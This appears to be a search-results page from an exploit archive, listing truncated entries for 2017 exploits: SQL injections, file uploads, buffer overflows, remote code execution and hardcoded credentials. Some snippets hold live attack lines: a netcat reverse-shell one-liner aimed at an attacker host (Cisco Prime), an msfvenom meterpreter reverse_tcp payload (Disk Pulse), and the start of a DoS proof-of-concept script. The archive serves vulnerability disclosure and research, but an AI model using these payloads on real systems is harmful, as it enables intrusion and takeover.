47885 matches found
ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download
Exploit Title: ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download Dork: N/A Date: 29.09.2017 Vendor Homepage: https://codecanyon.net/user/lemonadeflirt Software Link: https://codecanyon.net/item/converto-video-downloader-converter/13225966 Demo: http://vd.googglet.com/ Version:...
Easy Blog PHP Script 1.3a - 'id' SQL Injection
Exploit Title: Easy Blog PHP Script v1.3a - SQL Injection Date: 2017-09-27 Exploit Author: 8bitsec Vendor Homepage: https://www.codester.com/ Software Link: https://www.codester.com/items/4616/easy-blog-php-script Version: 1.3a Tested on: Kali Linux 2.0 | Mac OS 10.12.6 Email: [email protected]...
DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow
!/usr/bin/python ======================================================================================================================== Exploit Author: Touhid M.Shaikh Exploit Title: DiskBoss Enterprise v8.4.16 "Import Command" Buffer Overflow Date: 29-09-2017 Website: www.touhidshaikh.com...
Trend Micro OfficeScan 11.0/XG (12.0) - Code Execution / Memory Corruption
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14086-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-START-REMOTE-PROCESS-CODE-EXECUTION-MEM-CORRUPT.txt + ISR: ApparitionSec Vendor: ================== www.trendmicro.com...
Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14083-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-REMOTE-ENCRYPTION-KEY-DISCLOSURE.txt + ISR: ApparitionSec Vendor: ================== www.trendmicro.com Product: ========...
Trend Micro OfficeScan 11.0/XG (12.0) - Information Disclosure
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14085-TRENDMICRO-OFFICESCAN-XG-REMOTE-NT-DOMAIN-PHP-INFO-DISCLOSURE.txt + ISR: ApparitionSec Vendor: ================== www.trendmicro.com Product: ===========...
Microsoft Office Groove - 'Workspace Shortcut' Arbitrary Code Execution
Title: MS Office Groove 'Workspace Shortcut' Arbitrary Code Execution Vulnerability Date: September 28th, 2017. Author: Eduardo Braun Prado Vendor Homepage: http://www.microsoft.com/ Software Link: https://products.office.com/ Version: 2007 32-bits x86 Tested on: Windows 7/Server 2008/Vista/Serve...
DiskBoss Enterprise 8.4.16 - Local Buffer Overflow (PoC)
!/usr/bin/python ======================================================================================================================== Exploit Author: Touhid M.Shaikh Exploit Title: DiskBoss Enterprise v8.4.16 Local Buffer OverflowPoC Date: 28-09-2017 Website: www.touhidshaikh.com Vulnerable...
Trend Micro OfficeScan 11.0/XG (12.0) - Man In The Middle Remote Code Execution
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14084-TRENDMICRO-OFFICESCAN-XG-CURL-MITM-REMOTE-CODE-EXECUTION.txt + ISR: ApparitionSec Vendor: ================== www.trendmicro.com Product: ======== OfficeScan...
Real Estate MLM plan script 1.0 - 'srch' SQL Injection
Exploit Title: Real Estate MLM plan script v1.0 - 'srch' Parameter SQL Injection Date: 2017-09-28 Exploit Author: 8bitsec Vendor Homepage: http://www.mlmscript.in/ Software Link: http://www.mlmscript.in/real-estate-mlm-script.html Version: 1.0 Tested on: Kali Linux 2.0 | Mac OS 10.12.6 Email:...
Trend Micro OfficeScan 11.0/XG (12.0) - Server Side Request Forgery
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-OFFICESCAN-XG-SERVER-SIDE-REQUEST-FORGERY.txt + ISR: ApparitionSec Vendor: ================== www.trendmicro.com Product: =========== OfficeScan v11.0 and XG 12.0...
PHP Multi Vendor Script 1.02 - 'sid' SQL Injection
Exploit Title: PHP Multi Vendor Script v1.02 - 'sid' Parameter SQL Injection Date: 2017-09-28 Exploit Author: 8bitsec Vendor Homepage: http://www.dexteritysolution.com/ Software Link: http://www.dexteritysolution.com/php-multivendor-e-commerce-script.html Version: 1.02 Tested on: Kali Linux 2.0 |...
Roteador Wireless Intelbras WRN150 - Autentication Bypass
Exploit Title: Autentication Bypass/Config file download - INTELBRAS WRN 150 Date: 28/09/2017 Exploit Author: Elber Tavares Vendor Homepage: http://intelbras.com.br/ Version: Intelbras Wireless N 150 Mbps - WRN 150 Tested on: kali linux, windows 7, 8.1, 10 For more info:...
Trend Micro OfficeScan 11.0/XG (12.0) - 'Host' Header Injection
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14087-TRENDMICRO-OFFICESCAN-XG-HOST-HEADER-INJECTION.txt + ISR: ApparitionSec Vendor: ================== www.trendmicro.com Product: ======== OfficeScan v11.0 and XG...
Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-OFFICESCAN-XG-IMAGE-FILE-EXECUTION-BYPASS.txt + ISR: ApparitionSec Vendor: ================== www.trendmicro.com Product: ======== OfficeScan v11.0 and XG 12.0...
LAquis SCADA 4.1.0.2385 - Directory Traversal (Metasploit)
require 'msf/core' class MetasploitModule 'LAquis SCADA Web Server Directory Traversal Information Disclosure', 'Description' = %q This module exploits a directory traversal vulnerability found in the LAquis SCADA application. The vulnerability is triggered when sending a series of dot dot slashe...
Netgear ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution
Exploit Netgear ReadyNAS Surveillance 1.4.3-16 Unauthenticated RCE Date: 27.09.2017 Software Link: https://www.netgear.com/ Exploit Author: Kacper Szurek Contact: https://twitter.com/KacperSzurek Website: https://security.szurek.pl/ Category: remote 1. Description $GET'uploaddir' is not escaped a...
SmarterStats 11.3.6347 - Cross-Site Scripting
---------------------------- Title: CVE-2017-14620 ---------------------------- TL;DR: SmarterStats Version 11.3.6347, and possibly prior versions, will Render the Referer Field of HTTP Logfiles in URL /Data/Reports/ReferringURLsWithQueries ---------------------------- Author: David Hoyt Date:...
Oracle WebLogic Server 10.3.6.0 - Java Deserialization Remote Code Execution
Exploit Title: Oracle WebLogic Server Java Deserialization Remote Code Execution Date: 27/09/2017 Exploit Author: SlidingWindow , Twitter: @kapilkhot Vulnerability Author: FoxGloveSecurity Vendor Homepage: http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html Affetcted Version...
Sync Breeze Enterprise 10.0.28 - Denial of-Service (PoC)
!/usr/bin/python import socket import sys try: server = sys.argv1 port = 80 size = 800 inputBuffer = b"A" size content = b"username=" + inputBuffer + b"&password=A" buffer = b"POST /login HTTP/1.1\r\n" buffer += b"Host: " + server.encode + b"\r\n" buffer += b"User-Agent: Mozilla/5.0 X11; Linux866...
Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution
Exploit Title: Cisco Prime Collaboration Provisioning function encode echo "$1" | perl -MURI::Escape -ne 'chomp;print uriescape$,"\n"' TARGET=$1 ATTACKER=$2 PORT=$3 BASH=$encode "/bin/bash" COMMAND=$encode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&1|nc $ATTACKER $PORT /tmp/f"...
NodeJS Debugger - Command Injection (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "NodeJS Debugger Command Injection", 'Description' = %q This module uses the "evaluate" request type of the NodeJS V8 debugger protocol version 1 t...
Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation
/ CVE-2017-1000253.c - an exploit for CentOS-7 kernel versions 3.10.0-514.21.2.el7.x8664 and 3.10.0-514.26.1.el7.x8664 Copyright C 2017 Qualys, Inc. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free...
WordPress Plugin WPGYM - SQL Injection
Exploit Title: WPGYM - Wordpress Gym Management System - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/-wpgym-wordpress-gym-management-system/13352964 Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/gym/ Version...
WordPress Plugin Hospital Management System - SQL Injection
Exploit Title: Hospital Management System for Wordpress - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/hospital-management-system-for-wordpress/12094634 Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/hospital/...
Job Links - Arbitrary File Upload
Exploit Title: Job Links - Complete Job Management Script - Arbitrary File Upload Dork: N/A Date: 26.09.2017 Vendor Homepage: http://teamworktec.com/ Software Link: https://codecanyon.net/item/job-links-complete-job-management-script/20672089 Demo: http://teamworktec.com/demo/job-links/ Version:...
Tiny HTTPd 0.1.0 - Directory Traversal
====================================================================================== Exploit Author: Touhid M.Shaikh Exploit Title: Tiny HTTPd 0.1.0 Local File Traversal Date: 26-09-2017 Website: www.touhidshaikh.com Vulnerable Software: Tiny HTTPd Version: 0.1.0 Download Link:...
AMC Master - Arbitrary File Upload
Exploit Title: Annual Maintenance Contract Management System - Arbitrary File Upload Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/amc-master-annual-maintenance-contract-management-system/20667703 Demo:...
TicketPlus - Arbitrary File Upload
Exploit Title: TicketPlus - Support Ticket Management System - Arbitrary File Upload Dork: N/A Date: 26.09.2017 Vendor Homepage: http://teamworktec.com/ Software Link: https://codecanyon.net/item/ticketplus-support-ticket-management-system/20221316 Demo: http://sportsgrand.com/demo/ticketplus/...
WordPress Plugin School Management System - SQL Injection
Exploit Title: School Management System for Wordpress - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/school-management-system-for-wordpress/11470032 Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/school/...
SMSmaster - SQL Injection
Exploit Title: SMSmaster – Multipurpose SMS Gateway for Wordpress - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/smsmaster-multipurpose-sms-gateway-for-wordpress/20605853 Demo:...
Photo Fusion - Arbitrary File Upload
Exploit Title: Photo Fusion - Free Stock Photos Script - Arbitrary File Upload Dork: N/A Date: 26.09.2017 Vendor Homepage: http://teamworktec.com/ Software Link: https://codecanyon.net/item/photo-fusion-free-stock-photos-script/20115244 Demo: http://teamworktec.com/demo/photos-fusion/ Version: N/...
WordPress Plugin WPCHURCH - SQL Injection
Exploit Title: WPCHURCH - Church Management System for Wordpress - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/wpchurch-church-management-system-for-wordpress/14292251 Demo:...
WordPress Plugin WPAMS - SQL Injection
Exploit Title: WPAMS - Apartment Management System for wordpress - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/wpams-apartment-management-system-for-wordpress/15946837 Demo:...
Apple iOS 10.2 - Broadcom Out-of-Bounds Write when Handling 802.11k Neighbor Report Response
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1289 The exploit gains code execution on the Wi-Fi firmware on the iPhone 7. The exploit has been tested against the Wi-Fi firmware as present on iOS 10.2 14C92, but should work on all versions of iOS up to 10.3.3 included. However...
Linux/x86_64 - mkdir() 'evil' Shellcode (30 bytes)
Linux/x8664 - mkdir 'evil' Shellcode 30 bytes. Shellcode exploit for Linx86-64 platform / ;Title: Linux/x8664 - mkdir shellcode 30 bytes ;Author: Touhid M.Shaikh ;Contact: https://github.com/touhidshaikh ;Category: Shellcode ;Architecture: Linux x8664 ;Description: Create Folder with 755...
FLIR Thermal Camera PT-Series (PT-334 200562) - Root Remote Code Execution
!/bin/bash FLIR Systems FLIR Thermal Camera PT-Series PT-334 200562 Remote Root Exploit Vendor: FLIR Systems, Inc. Product web page: http://www.flir.com Affected version: Firmware version: 8.0.0.64 Software version: 10.0.2.43 Release: 1.3.4 GA, 1.3.3 GA and 1.3.2 Summary: FLIR's PT-Series of...
FLIR Thermal Camera F/FC/PT/D - SSH Backdoor Access
FLIR Systems FLIR Thermal Camera F/FC/PT/D Hard-Coded SSH Credentials Vendor: FLIR Systems, Inc. Product web page: http://www.flir.com Affected version: Firmware version: 8.0.0.64 Software version: 10.0.2.43 Release: 1.4.1, 1.4, 1.3.4 GA, 1.3.3 GA and 1.3.2 FC-Series S FC-334-NTSC FC-Series ID...
Adobe Flash - Out-of-Bounds Memory Read in MP4 Parsing
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1321 The attached MP4 file causes an out-of-bounds memory access when played in flash player. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42781.zip...
Oracle 9i XDB 9.2.0.1 - HTTP PASS Buffer Overflow
Exploit Title:Oracle 9i XDB HTTP PASS Buffer Overflow Date: 09/25/2017 Exploit Author: Charles Dardaman Twitter: https://twitter.com/CharlesDardaman Website: http://www.dardaman.com Version:9.2.0.1 Tested on: Windows 2000 SP4 CVE: 2003-0727 This is a modified stand alone exploit of...
FLIR Thermal Camera FC-S/PT - Command Injection
FLIR Systems FLIR Thermal Camera FC-S/PT Authenticated OS Command Injection Vendor: FLIR Systems, Inc. Product web page: http://www.flir.com Affected version: Firmware version: 8.0.0.64 Software version: 10.0.2.43 Release: 1.4.1, 1.4, 1.3.4 GA, 1.3.3 GA and 1.3.2 FC-Series S FC-334-NTSC PT-Series...
Adobe Flash - Out-of-Bounds Read in applyToRange
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1323 The attached fuzzed file causes an out-of-bounds read in TextFormat.applyToRange. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42783.zip...
Adobe Flash - Out-of-Bounds Write in MP4 Edge Processing
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1322 The attached fuzzed MP4 file causes an out-of-bounds memory access when played with Adobe Flash Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42782.zip...
FLIR Thermal Camera F/FC/PT/D - Information Disclosure
FLIR Systems FLIR Thermal Camera F/FC/PT/D Multiple Information Disclosures Vendor: FLIR Systems, Inc. Product web page: http://www.flir.com Affected version: Firmware version: 8.0.0.64 Software version: 10.0.2.43 Release: 1.4.1, 1.4, 1.3.4 GA, 1.3.3 GA and 1.3.2 FC-Series S FC-334-NTSC FC-Series...
Disk Pulse Enterprise 10.0.12 - GET Buffer Overflow (SEH)
Tested on Windows XP SP3 x86 The application requires to have the web server enabled. !/usr/bin/python import socket, threading, struct host = "192.168.228.155" port = 80 def sendegghunterrequest: msfvenom -p windows/meterpreter/reversetcp LHOST=192.168.228.158 LPORT=443 -f py buf =...
FLIR Thermal Camera F/FC/PT/D - Stream Disclosure
FLIR Systems FLIR Thermal Camera F/FC/PT/D Stream Disclosure Vendor: FLIR Systems, Inc. Product web page: http://www.flir.com Affected version: Firmware version: 8.0.0.64 Software version: 10.0.2.43 Release: 1.4.1, 1.4, 1.3.4 GA, 1.3.3 GA and 1.3.2 FC-Series S FC-334-NTSC FC-Series ID FC-Series-R...
Supervisor 3.0a1 < 3.3.2 - XML-RPC (Authenticated) Remote Code Execution (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Supervisor XML-RPC Authenticated Remote Code Execution", 'Description' = %q This module exploits a vulnerability in the Supervisor process control...
HBGK DVR 3.0.0 build20161206 - Authentication Bypass
Exploit Title: HBGK DVR V3.0.0 build20161206 - Authentication Bypass Date: 24-09-2017 Vendor Homepage: http://www.hbgk.net/en/ Exploit Author: RAT - ThiefKing Contact: https://www.facebook.com/cctvsuperpassword Website: http://tromcap.com Category: webapps Tested on: V2.3.1 build20160927, V3.0.0...
CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)
!/usr/bin/python Exploit Title: CyberLink LabelPrint =2.5 File Project Processing Unicode Stack Overflow Date: September 23, 2017 Exploit Author: f3ci Vendor Homepage: https://www.cyberlink.com/ Software Link:...
Secure E-commerce Script 1.02 - 'sid' SQL Injection
Exploit Title: Secure E-commerce Script v1.02 - SQL Injection Date: 2017-09-22 Exploit Author: 8bitsec Vendor Homepage: http://www.phpscriptsmall.com/ Software Link: http://www.phpscriptsmall.com/product/secure-e-commerce-script/ Version: 1.02 Tested on: Kali Linux 2.0 | Mac OS 10.12.6 Email:...